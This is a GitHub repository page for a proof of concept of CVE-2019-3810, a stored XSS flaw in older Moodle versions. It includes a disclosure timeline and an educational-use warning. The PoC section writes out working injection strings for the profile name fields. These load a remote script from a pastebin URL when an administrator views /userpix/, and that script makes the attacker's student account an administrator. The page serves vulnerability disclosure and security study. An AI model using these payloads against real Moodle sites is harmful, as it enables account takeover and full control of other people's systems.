Skip to content

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin)

Notifications You must be signed in to change notification settings

farisv/Moodle-CVE-2019-3810

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 

Repository files navigation

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin). This is one of the past bugs that I discovered during past pentest in an academic institution. It was successful enough at the time to practically steal admin access and gain complete control over Moodle using just one simple bug.

We can see from the git history, the bug existed since old versions of Moodle (2003) and just patched in 2019.

Timeline:

  • December 2018 - Reported the bug to Moodle
  • January 2019 - Patch released
  • April 2021 - PoC disclosure

WARNING

FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THE EXPLOIT FOR ILLEGAL ACTIVITIES. THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.

PoC

  1. Upload the payload.js to pastebin or other similar service. Change the value of userid to your own id. Let's say the URL is https://pastebin.com/raw/xxxxxxxx.
  2. Login to your student account.
  3. Set first name with " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. Set surname with ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. Ask the administrator to open /userpix/ page or put the link to that page on your post and wait.

If successful, your account will be added as administrator.

Demonstration video

About

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC for Privilege Escalation (Student to Admin)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published